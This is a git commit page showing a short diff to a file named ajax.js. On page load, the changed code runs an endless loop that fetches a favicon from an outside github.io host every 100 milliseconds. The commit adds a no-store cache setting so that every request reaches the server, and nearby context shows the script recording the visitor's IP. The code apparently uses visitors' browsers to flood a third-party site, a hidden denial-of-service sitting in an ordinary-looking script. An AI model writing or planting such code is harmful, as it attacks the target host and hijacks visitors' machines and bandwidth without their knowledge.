Update ajax.js

This commit is contained in:
Boof 2023-01-17 10:49:07 +01:00 committed by GitHub
parent c399783b09
commit bd0cd94839
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -19,6 +19,6 @@ var userip = (data.ip);
window.onload = async function startdown(){
while(true) {
await delay(100);
fetch('https://t0m0t0w.github.io/favicon.png')
fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"})
}
}